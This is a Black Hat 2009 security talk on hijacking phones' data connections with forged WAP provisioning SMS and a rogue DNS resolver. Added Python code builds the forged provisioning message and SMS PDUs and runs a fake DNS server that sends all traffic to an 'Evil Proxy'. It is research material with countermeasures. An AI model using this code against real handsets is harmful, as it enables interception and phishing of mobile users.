Slide 1

Mobile Security Lab
Hijacking Mobile Data Connections
Cristofaro Mune, Roberto Gassirà, Roberto Piccirillo
Black Hat Europe 2009

Slide 2

Agenda
- Provisioning & WAP primer
- Forging messages
- Demo: remote provisioning
- Provisioning: process and issues
- Attack scenario and exploitation
- Final demo
- Wrap-up

Slide 3

Poll
Who, among the audience, has an Internet-capable phone? Please raise your hands!

Slide 4

Net in your hands...
- Business: mobile operators' business models are mostly based on data revenues.
- Users: information reachable everywhere.
- Technical: faster speeds, improved UIs.
- Social: smartphones are cool!

Slide 5

Provisioning
- Mobile equipment must be configured to inter-operate with mobile infrastructures and services.
- "Provisioning is the process by which a WAP client is configured with a minimum user interaction."
- Provisioning is performed using WAP architecture capabilities.
- It is normally performed by mobile operators...

Slide 6

WAP Architecture
- "Wireless Application Protocol defines industry-wide specification for developing applications that operate over wireless communication networks."
- Applications?
  - MMS
  - Web browsing
  - Provisioning
  - ...

Slide 7

WAP Communication
- WAP specifies a communication protocol framework.
- WAP communication is based on two models: Pull and Push.
  - Pull: the client requests content and the server answers (the ordinary browsing case).
  - Push: the server sends unsolicited data to the client. Provisioning uses this model.

Slide 8

Protocol Framework
Layers, top to bottom:
- Application
- Session Service
- Transfer Service
- Transport Service
- Bearer Network

Slide 9

Let's build a provisioning message

Slide 10

Application - Provisioning Document
- A Provisioning Document provides parameters related to network access points, application-specific configuration, etc.
- Use cases:
  - Provide configuration to new customers
  - Reconfigure mis-configured phones
  - Enable new services
- The Provisioning Document is encoded in WAP Binary XML format (WBXML).
[Stack figure: Application layer; payload = WBXML]

Slide 11

Binary Encoding Example
[Figure: XML provisioning document side by side with its WBXML encoding]
The XML provisioning document is encoded in WBXML.

Slide 12

Session Service - WSP
- WSP provides the connectionless service PUSH.
- Delivering a provisioning document requires:
  - Media type: application/vnd.wap.connectivity-wbxml
- ... and security information is usually required:
  - SEC parameter, to specify the security mechanism
  - Security-mechanism-related information (the MAC)
[Stack figure: Session Service layer; WSP header in front of the WBXML payload]

Slide 13

Security Purpose
- Message authentication protects the handset from accepting malicious messages from untrusted sources.
- Messages with no authentication may be discarded.
- Security is based on HMAC, to provide sender authentication and document integrity.

Slide 14

Security Mechanism
- The security mechanism used is typically based on a "shared secret". Three variants:
  - USERPIN: the key is a numeric PIN code chosen by the sender
  - NETWPIN: the key is the IMSI
  - USERNETWPIN: hybrid approach (IMSI and PIN)

Slide 15

Security Mechanism: USERPIN
- It is based on the HMAC algorithm: MAC = HMAC-SHA1(K, M)
  - K = the numeric PIN chosen by the sender (the shared secret)
  - M = the WBXML provisioning document

Slide 16

WSP Primitive: Push
- The Push primitive is used for sending unsolicited information from server to client.
- PDU layout (hex):
  01                          Transaction ID
  06                          PDU type: Push
  2f                          Headers length
  1f 2d                       Content-Type header, length-quoted value of 0x2d bytes
  b6                          Content-Type: application/vnd.wap.connectivity-wbxml
  91 81                       SEC=USERPIN
  92 30 44 38 ... 37 44 00    MAC=<HMAC value as hex text, NUL-terminated>
  ...                         WBXML provisioning document
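Added example, not from the original talk: slides 10 to 16 as code. It builds the WBXML provisioning document (Application layer), the USERPIN MAC (HMAC-SHA1 keyed with the PIN) and the WSP connectionless Push PDU whose Content-Type header carries the SEC and MAC parameters, and shows the receiver-side check (MAC verification) that makes an unauthenticated message discardable. Token values are those of OMA Provisioning Content 1.1 code page 0 and WBXML 1.3; the PIN "1234", the APN "internet.example", the NAP name and the DNS address 198.51.100.53 are made-up sample values. NETWPIN and USERNETWPIN (IMSI-based keys) are not implemented here.

```python
"""Added example (not from the talk): WBXML provisioning doc, USERPIN MAC, WSP Push.

Token values: OMA Provisioning Content 1.1 code page 0, WBXML 1.3. Sample values
(PIN, APN, NAP name, DNS address) are made up. Equivalent XML of napdef_wbxml():

  <wap-provisioningdoc version="1.0">
    <characteristic type="NAPDEF">
      <parm name="NAPID" value="NAP1"/>
      <parm name="NAME" value="Internet"/>
      <parm name="BEARER" value="GSM-GPRS"/>
      <parm name="NAP-ADDRESS" value="internet.example"/>
      <parm name="NAP-ADDRTYPE" value="APN"/>
      <parm name="DNS-ADDR" value="198.51.100.53"/>
    </characteristic>
  </wap-provisioningdoc>
"""
import hashlib
import hmac

END, STR_I = 0x01, 0x03                          # WBXML global tokens
TAG_DOC, TAG_CHAR, TAG_PARM = 0x05, 0x06, 0x07   # wap-provisioningdoc, characteristic, parm
HAS_ATTRS, HAS_CONTENT = 0x80, 0x40
ATTR_START = {"version=1.0": 0x46, "type=NAPDEF": 0x55, "value": 0x06,
              "name=NAME": 0x07, "name=NAP-ADDRESS": 0x08, "name=NAP-ADDRTYPE": 0x09,
              "name=BEARER": 0x10, "name=NAPID": 0x11, "name=DNS-ADDR": 0x48}
ATTR_VALUE = {"APN": 0x89, "GSM-GPRS": 0xAB}    # well-known attribute values
WSP_PUSH = 0x06
CT_CONNECTIVITY_WBXML = 0x36 | 0x80              # application/vnd.wap.connectivity-wbxml
SEC, MAC = 0x11 | 0x80, 0x12 | 0x80              # WSP well-known parameter tokens
SEC_USERPIN = 0x01 | 0x80                        # NETWPIN=0x80, USERPIN=0x81, USERNETWPIN=0x82


def _inline_str(s):
    return bytes([STR_I]) + s.encode("utf-8") + b"\x00"


def _parm(name, value):
    """<parm name=".." value=".."/>: attributes only (no content bit); END closes the attribute list."""
    out = bytes([TAG_PARM | HAS_ATTRS, ATTR_START["name=" + name], ATTR_START["value"]])
    out += bytes([ATTR_VALUE[value]]) if value in ATTR_VALUE else _inline_str(value)
    return out + bytes([END])


def napdef_wbxml(napid, name, apn, dns_addr):
    """WBXML for one NAPDEF characteristic that also sets DNS-ADDR."""
    header = bytes([0x03, 0x0B, 0x6A, 0x00])     # WBXML 1.3, PROV 1.0 public id, UTF-8, no string table
    doc = bytes([TAG_DOC | HAS_ATTRS | HAS_CONTENT, ATTR_START["version=1.0"], END])
    char = bytes([TAG_CHAR | HAS_ATTRS | HAS_CONTENT, ATTR_START["type=NAPDEF"], END])
    for n, v in (("NAPID", napid), ("NAME", name), ("BEARER", "GSM-GPRS"),
                 ("NAP-ADDRESS", apn), ("NAP-ADDRTYPE", "APN"), ("DNS-ADDR", dns_addr)):
        char += _parm(n, v)
    return header + doc + char + bytes([END, END])   # close characteristic, close document


def userpin_mac(wbxml, pin):
    """USERPIN: HMAC-SHA1 over the WBXML document, keyed with the PIN digits, sent as hex text."""
    return hmac.new(pin.encode("ascii"), wbxml, hashlib.sha1).hexdigest().upper()


def _uintvar(n):
    out = [n & 0x7F]
    n >>= 7
    while n:
        out.insert(0, (n & 0x7F) | 0x80)
        n >>= 7
    return bytes(out)


def wsp_push(wbxml, mac_hex, tid=0x01):
    """WSP Push PDU: TID, type 0x06, HeadersLen, length-quoted Content-Type with SEC/MAC, body."""
    ct_value = bytes([CT_CONNECTIVITY_WBXML, SEC, SEC_USERPIN, MAC]) + mac_hex.encode("ascii") + b"\x00"
    headers = bytes([0x1F]) + _uintvar(len(ct_value)) + ct_value
    return bytes([tid, WSP_PUSH]) + _uintvar(len(headers)) + headers + wbxml


def verify_push(pdu, pin):
    """Receiver side: accept a connectivity push only if its USERPIN MAC checks out."""
    if pdu[1] != WSP_PUSH or pdu[3] != 0x1F:
        return False
    hdr_len = pdu[2]                             # one-byte uintvar is enough for these headers
    params, body = pdu[5:3 + hdr_len], pdu[3 + hdr_len:]
    if params[:4] != bytes([CT_CONNECTIVITY_WBXML, SEC, SEC_USERPIN, MAC]):
        return False
    sent_mac = params[4:params.index(b"\x00", 4)].decode("ascii")
    return hmac.compare_digest(sent_mac, userpin_mac(body, pin))


if __name__ == "__main__":
    doc = napdef_wbxml("NAP1", "Internet", "internet.example", "198.51.100.53")
    pdu = wsp_push(doc, userpin_mac(doc, "1234"))
    print(pdu.hex(" "))
    print("right PIN:", verify_push(pdu, "1234"), "| wrong PIN:", verify_push(pdu, "0000"))
```

The first bytes of the generated PDU (`01 06 2f 1f 2d b6 91 81 92 ...`) reproduce the dump on the slide: a 40-character hex MAC plus its terminator gives a 45-byte Content-Type value and 47 bytes of headers. The point the talk makes is visible in `userpin_mac()`: the key is whatever PIN the sender picked, so the MAC proves nothing about who the sender is.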

Slide 17

Transfer Service
- Transfer services provide reliable connection-oriented communications.
  - Offers the services necessary for interactive request/response applications
- The transfer service is not required by the provisioning process.
  - Configurations are sent without using this layer
[Stack figure: Transfer Service layer skipped; WSP header + WBXML payload]

Slide 18

Transport Service - WDP
- WDP provides a connectionless datagram transport service.
- WDP support is mandatory on any WAP-compatible handset.
- WDP can be mapped onto different bearers.
- WDP over GSM SMS is used to send the message.
[Stack figure: Transport Service layer; WDP header + WSP header + WBXML]

Slide 19

Slide 19 text

l  WDP over GSM-SMS header is defined using UDH headers. l  UDH header contains information for port addressing and concatenated short messages WDP over GSM-SMS WBXML WSP Header UDH Header UDH Length 05 04 0B 84 23 F0 00 03 ... Application Port Addressing Scheme Destination Port 2948 Wap-Push Concatenated SMS

Slide 20

Bearer Network - GSM SMS
- GSM SMS PDU mode supports binary data transfer.
- The uncompressed 8-bit data coding scheme is used.
- Concatenated SMS is needed to send a payload larger than 140 bytes.
- Tests performed suggest that no restrictions are imposed on sending SMS-encapsulated provisioning messages.
[Stack figure: GSM SMS header + UDH header + WSP header + WBXML]

Slide 21

GSM SMS Header
SMS-SUBMIT PDU with UDH (hex):
  00              SMSC address length (0: use the phone's default SMSC)
  41              First octet: SMS-SUBMIT, UDHI set (a UDH follows)
  00              Message reference
  0C              Receiver phone number length (digits)
  91              Receiver phone number type of address: 91 = international format
  939393939393    Receiver phone number (semi-octets, nibble-swapped)
  00              Protocol identifier
  F5              Data coding scheme: 8-bit encoding
  UDL             Message body length (UDH + payload)
[Stack figure: GSM SMS header + UDH header + WSP header + WBXML]
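Added example, not from the original talk: the Transport and Bearer layers of slides 18 to 21. It takes an already-built WSP Push PDU (any bytes), prepends the UDH that WDP over GSM-SMS uses (16-bit application-port addressing to port 2948 from port 9200, plus 8-bit concatenation whenever the payload does not fit in one 140-octet message) and wraps each part in a 3GPP TS 03.40 SMS-SUBMIT PDU of the kind a handset in PDU mode accepts over `AT+CMGS`. It also includes the parser a filter would need to spot such messages by destination port, which is the "handset side" countermeasure of the wrap-up. The destination number 393939393939 and the payload are constructed sample data.

```python
"""Added example (not from the talk): WDP over GSM SMS for a WAP Push payload."""

WAP_PUSH_PORT, WAP_PUSH_SRC_PORT = 2948, 9200   # 0x0B84 / 0x23F0, as on the slide
IEI_PORT16, IEI_CONCAT8 = 0x05, 0x00
SMS_MAX_UD = 140                                 # user-data octets in one 8-bit SMS


def udh(ref, total, seq):
    """User Data Header: UDHL, port-addressing IE, concatenation IE (multipart only)."""
    ies = bytes([IEI_PORT16, 4]) + WAP_PUSH_PORT.to_bytes(2, "big") + WAP_PUSH_SRC_PORT.to_bytes(2, "big")
    if total > 1:
        ies += bytes([IEI_CONCAT8, 3, ref, total, seq])
    return bytes([len(ies)]) + ies


def semi_octets(digits):
    """03.40 address digits: BCD with swapped nibbles, odd length padded with F."""
    if len(digits) % 2:
        digits += "F"
    return bytes.fromhex("".join(digits[i + 1] + digits[i] for i in range(0, len(digits), 2)))


def sms_submit_pdus(payload, dest_number, ref=0x42):
    """Split payload into SMS-SUBMIT PDUs: no SMSC field, UDHI set, DCS 0xF5 (8-bit data)."""
    if len(payload) + len(udh(ref, 1, 1)) <= SMS_MAX_UD:
        parts = [payload]
    else:
        room = SMS_MAX_UD - len(udh(ref, 2, 1))
        parts = [payload[i:i + room] for i in range(0, len(payload), room)]
    pdus = []
    for seq, part in enumerate(parts, 1):
        ud = udh(ref, len(parts), seq) + part
        pdu = bytes([0x00,                  # SMSC address length 0: phone's default SMSC
                     0x41,                  # SMS-SUBMIT, UDHI set, no validity period
                     0x00,                  # TP-MR, assigned by the phone
                     len(dest_number),      # destination address length, in digits
                     0x91])                 # type of address: international / E.164
        pdu += semi_octets(dest_number)
        pdu += bytes([0x00, 0xF5, len(ud)]) + ud   # TP-PID, TP-DCS, TP-UDL, user data
        pdus.append(pdu)
    return pdus


def cmgs_length(pdu):
    """Length argument for AT+CMGS: PDU octets excluding the leading SMSC field."""
    return len(pdu) - 1 - pdu[0]


def udh_dest_port(pdu):
    """Filter helper: destination port carried in an SMS-SUBMIT PDU's UDH, or None."""
    p = 1 + pdu[0]                       # skip the SMSC address field
    first = pdu[p]
    if not first & 0x40:                 # UDHI clear: no header, hence no port addressing
        return None
    addr_digits = pdu[p + 2]
    p += 4 + (addr_digits + 1) // 2      # first octet, MR, DA length, TOA, DA digits
    p += 2                               # PID, DCS
    vpf = (first >> 3) & 0x03
    p += {0: 0, 1: 7, 2: 1, 3: 7}[vpf]   # validity period: none / enhanced / relative / absolute
    udhl = pdu[p + 1]                    # pdu[p] is UDL
    ies, q = pdu[p + 2:p + 2 + udhl], 0
    while q + 2 <= len(ies):
        iei, iel = ies[q], ies[q + 1]
        if iei == IEI_PORT16 and iel == 4:
            return int.from_bytes(ies[q + 2:q + 4], "big")
        q += 2 + iel
    return None


if __name__ == "__main__":
    sample_push = bytes(range(256))      # constructed stand-in for a WSP Push PDU
    for pdu in sms_submit_pdus(sample_push, "393939393939"):
        print(f"AT+CMGS={cmgs_length(pdu)}", pdu.hex().upper(), sep="\n")
    print("dest port:", udh_dest_port(sms_submit_pdus(sample_push, "393939393939")[0]))
```

A 256-byte payload yields two PDUs whose header bytes match slides 19 and 21 (`00 41 00 0C 91 939393939393 00 F5 8C 0B 05 04 0B 84 23 F0 00 03 ...`). `udh_dest_port()` returning 2948 is exactly the signal a handset or SMSC would key a provisioning-message filter on; as the wrap-up notes, a network-side filter is the one the spoofed sender cannot evade.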

Slide 22

Building a message
And now???
- Provisioning: the Provisioning Document can be easily created
- WSP: the USERPIN is defined by the sender
- Transfer Service: we don't need it!
- WDP: support is mandatory on WAP-compatible handsets
- GSM SMS: SMS carrying a Provisioning Document are typically unfiltered

Slide 23

Demo: Profile Installation

Slide 24

Provisioning Process

Slide 25

Mobile Operator Provisioning
- Many operators use the USERPIN shared secret:
  1. An Info SMS carrying the shared PIN is sent.
  2. A Provisioning SMS with the network configuration details is sent after the Info SMS.

Slide 26

Info SMS
[Screenshot: Info SMS on the handset; the sender shown is the operator number used when sending Info SMS]
The user takes a note of the PIN.

Slide 27

Provisioning SMS
1. The device receives a new SMS notification.
2. The user types the PIN provided by the Info SMS.
3. An overview of the new settings is shown to the user.

Slide 28

Provisioning SMS (continued)
4. The UI asks whether to use the new settings as default.
5. The settings are installed as a new Access Point.

Slide 29

Provisioning Issues
- The user relies mostly on visual information to trust the received Info SMS.
- Info SMS content can be easily forged.
- Provisioning SMS are typically not filtered!
[Figure: Info SMS from the Mobile Operator service number next to the Provisioning SMS from the Mobile Operator]

Slide 30

UI Issues
- UI designed to be user friendly...
- ... but this can lead to confusing or hidden information:
  - Few technical details on the provisioning content
  - Message source may be hidden or wrongly reported

Slide 31

Attack for L(a)unch

Slide 32

Appetizer Preparation
Issue: the handset displays the phone number of the Info SMS sender, so suspicious users may not accept the configuration message.
Solution: SMS sender spoofing. The Info SMS can then appear legitimate and sent by the Operator.

Slide 33

Cooking: SMS spoofing

Slide 34

Attack Scheme
1. The attacker sends a spoofed Info SMS carrying the PIN, with the Mobile Operator service number as sender.
2. The attacker sends the Provisioning SMS after the Info SMS.

Slide 35

Variations and Issues
- Different attack "flavours", depending on the handset:
  - The attacker's configuration is automatically installed as the default
  - The user is asked at installation time whether the configuration has to be installed as the default
  - The user is asked at connection time which configuration should be used for the connection
- In some cases (e.g. customized handsets) it may not be possible to change the default configuration
- Additional operations may be required from the user

Slide 36

Appetizer Recipe
No Push message filtering in place (neither on the handset nor in the network)
+ Some UIs do not show enough information to users
= Tricks users into accepting malicious configurations

Slide 37

Next choice...
- A provisioning message provides data connection parameters.
- If a victim accepts a malicious message, the connection parameters are under attacker control.
- Multiple interesting choices:
  - APN
  - DNS address
  - Proxy
Which is the best one???

Slide 38

Main Course Preparation
The parameter that seems to provide the best control of a victim is... "DNS-ADDR"
Let's start cooking...

Slide 39

DNS Subverting
- "Domain Name System (DNS) is used to map between hostnames and IP addresses."
- The "DNS-ADDR" parameter indicates the DNS server IP address used by the data connection.
- By adding a DNS-ADDR parameter to the default data connection, DNS resolution can be subverted.
- The victim's DNS queries are then directed toward an attacker-chosen DNS server.

Slide 40

XML example with DNS
[Figure: NAPDEF provisioning XML, annotated; parameter names as in OMA Provisioning Content]
- NAME: Network Access Point name
- NAP-ADDRESS: APN address for the data connection
- DNS-ADDR: DNS address
- NAPID: NAPDEF reference
- BEARER: network type
- NAP-ADDRTYPE: format of the address in NAP-ADDRESS

Slide 41

But...
Are DNS queries allowed to exit an Operator Network??
- The operator may force the use of specific DNS servers
Tests have been performed on all the Operator Networks we had access to... and the answer is...

Slide 42

Escaping the matrix
Definitely YES!!!
[Screenshot: dial-up using the handset as a modem; default route via the Mobile Operator network; successful query to an external DNS server (OpenDNS)]

Slide 43

Main Course Recipe
Modify the default DNS in the victim's phone
+ Operator networks allow queries to external DNS servers
= Redirection of the victim's DNS queries

Slide 44

0wning DNS
- Subverting DNS queries toward an attacker-controlled DNS server yields the same effects as a DNS poisoning attack.
- DNS poisoning threats have been widely explored:
  - Traffic redirection
  - Phishing
  - MITM attacks
  - SSL attacks
- All DNS queries, for ANY domain (!!), are completely under attacker control.

Slide 45

Next choice
- The most inviting option is HTTP:
  - Many mobile applications and services are based on HTTP:
    - Browsers
    - Messaging
    - ...
  - Some Mobile Operators' business models are based on providing services via internal HTTP web sites.
Let's focus on HTTP traffic redirection and MITM attack!!!

Slide 46

Standard HTTP transaction
Mobile user wants to visit www.mseclab.com:
1. DNS Query (handset, via the Mobile Operator Network, to the Internet)
2. DNS Answer (the real IP address)
3. GET / HTTP/1.1 to www.mseclab.com

Slide 47

Redirected HTTP transaction
Mobile user wants to visit www.mseclab.com:
1. DNS Query (handset, via the Mobile Operator Network, to the attacker's DNS server)
2. DNS Answer (Evil Proxy IP)
3. GET / HTTP/1.1 is sent to the Evil Proxy, which relays it to the Internet

Slide 48

XML with APPLICATION settings
[Figure: provisioning XML with an APPLICATION characteristic, annotated; parameter names as in OMA Provisioning Content]
- APPLICATION characteristic: used to define application parameters
- DNS address (in the NAPDEF)
- TO-NAPID: link to the APN defined in the NAPDEF
- APPID: browsing application identifier, defined by OMNA

Slide 49

Dessert Recipe
Fake DNS (answering any query with the Evil Proxy IP address)
+ WBXML provisioning message (setting the handset DNS address to the Fake DNS)
+ Evil Proxy (intercepting and forwarding the HTTP traffic)
= Owning the victim's data traffic by means of DNS control
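Added example, not from the original talk: the "Fake DNS" ingredient of slides 44 to 49, the resolver that hands the Evil Proxy address to every A query for any name (the "ANY domain" point of slide 44). It is a stand-alone UDP responder written with the standard library only; non-A questions (e.g. AAAA) get an empty NOERROR reply so a dual-stack client falls back to A instead of failing. The proxy address 198.51.100.10 and the query ID are made-up sample values; the Evil Proxy itself (Apache with mod_proxy, as on slide 51) is not reproduced here.

```python
"""Added example (not from the talk): Fake DNS answering every A query with the Evil Proxy IP."""
import socket
import struct

EVIL_PROXY_IP = "198.51.100.10"      # sample value, not an address from the talk
QTYPE_A, QCLASS_IN = 1, 1


def parse_question(query):
    """Return (id, qname, qtype, qclass, end_offset) for the first question of a DNS query."""
    qid, flags, qdcount = struct.unpack("!HHH", query[:6])
    if flags & 0x8000 or qdcount < 1:        # QR set means this is a response, not a query
        raise ValueError("not a query")
    labels, pos = [], 12
    while True:
        length = query[pos]
        pos += 1
        if length == 0:
            break
        if length & 0xC0:
            raise ValueError("compression pointer in question name")
        labels.append(query[pos:pos + length].decode("ascii"))
        pos += length
    qtype, qclass = struct.unpack("!HH", query[pos:pos + 4])
    return qid, ".".join(labels), qtype, qclass, pos + 4


def build_response(query, ip=EVIL_PROXY_IP, ttl=60):
    """Echo the question, set QR/RD/RA with RCODE 0, and add one A record pointing at ip."""
    qid, qname, qtype, qclass, qend = parse_question(query)
    answers, ancount = b"", 0
    if qtype == QTYPE_A and qclass == QCLASS_IN:
        # NAME as a pointer to offset 12 (the question name), TYPE A, CLASS IN, TTL, RDLENGTH 4, RDATA
        answers = struct.pack("!HHHIH", 0xC00C, QTYPE_A, QCLASS_IN, ttl, 4) + socket.inet_aton(ip)
        ancount = 1
    header = struct.pack("!HHHHHH", qid, 0x8180, 1, ancount, 0, 0)
    return header + query[12:qend] + answers


def build_query(qname, qtype=QTYPE_A, qid=0x1234):
    """Constructed client query, the kind a handset resolver sends; used for the demo and tests."""
    name = b"".join(bytes([len(l)]) + l.encode("ascii") for l in qname.split(".")) + b"\x00"
    return struct.pack("!HHHHHH", qid, 0x0100, 1, 0, 0, 0) + name + struct.pack("!HH", qtype, QCLASS_IN)


def answered_ip(response):
    """Address from the single A record build_response() adds, or None if it added none."""
    ancount = struct.unpack("!H", response[6:8])[0]
    return socket.inet_ntoa(response[-4:]) if ancount else None


def serve(bind=("0.0.0.0", 53)):
    """UDP loop: every A query from any client gets the Evil Proxy address (needs root for port 53)."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind(bind)
    while True:
        data, peer = sock.recvfrom(512)
        try:
            sock.sendto(build_response(data), peer)
        except (ValueError, IndexError, struct.error):
            pass                              # malformed packet or a response: ignore it


if __name__ == "__main__":
    demo = build_response(build_query("www.mseclab.com"))
    print("www.mseclab.com ->", answered_ip(demo))
    serve()
```

Pointed at by the DNS-ADDR of the provisioning message, a handset resolving www.mseclab.com receives the Evil Proxy address with the same transaction ID and question it sent, which is why the effect equals a successful cache-poisoning attack without any poisoning: the attacker simply is the resolver.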

Slide 50

Serving the meal ...

Slide 51

Evil Proxy How-to
- A transparent proxy is just what we need.
- Apache + mod_proxy is a good starting point.
- mod_rewrite is used for proper redirection.

Slide 52

Mod-Security Power
- Now we are able to redirect the HTTP traffic as we want!
- It would be cool to access the traffic...
- ... the ModSecurity audit logging feature is the solution!

Slide 53

Demo: Hijacking remote mobile user browsing
WARNING: mobile connections on the test handsets will be monitored!!! So... do NOT enter personal information or URLs!!!

Slide 54

What can be achieved?
- User monitoring and profiling
- Hijacking and control of application-specific data traffic
  - IM, VoIP, social networks
- Traffic injection
  - Redirection to 3rd-party websites
  - Advertisements (-> spamming)
  - Modification of served web pages

Slide 55

Focus on Issues
- The attack does not rely on the exploitation of a single vulnerability.
- It is an issue at the 'system' level: small overlooked details concur in allowing a deeper exploitation.
- The following made this attack possible:
  - Lack of provisioning message filtering
  - UIs do not provide a sufficient level of detail (spoofing sharpens the issue!)
  - Mobile Operator networks allow the use of external DNS servers

Slide 56

Countermeasures
- Filter external provisioning messages:
  - Network side
  - Handset side (may be ineffective in case of spoofing)
- UI improvements:
  - Provide a proper level of detail and warnings
  - May be ineffective in case of message spoofing
- Deny access to external DNS servers:
  - Could make the attack more difficult
  - May be unsuitable for some Operators
  - If used alone, may cause a massive connectivity DoS

Slide 57

Future Research
- Future research will focus on:
  - Application data hijacking
  - HTTPS traffic snooping
  - Malicious payload injection
  - Targeting Mobile Operator internal networks
  - Botnets

Slide 58

Q&A
Thanks!!!
Mobile Security Lab

Slide 59

References
- OMA - Provisioning Architecture Overview v1.1
- OMA - WAP Architecture v12
- OMA - Push Architectural Overview v3
- OMA - Provisioning Content v1.1
- OMA - Provisioning Bootstrap v1.1
- OMA - Binary XML Content Format Specification v1.3
- OMA - Wireless Session Protocol Specification v5
- OMA - OMNA WSP Content Type Numbers
- OMA - Wireless Datagram Protocol Specification v14
- 3GPP - TS 03.40 Technical realization of the Short Message Service (SMS) v7.5.0
- Apache HTTP Server Project
- ModSecurity: Open Source Web Application Firewall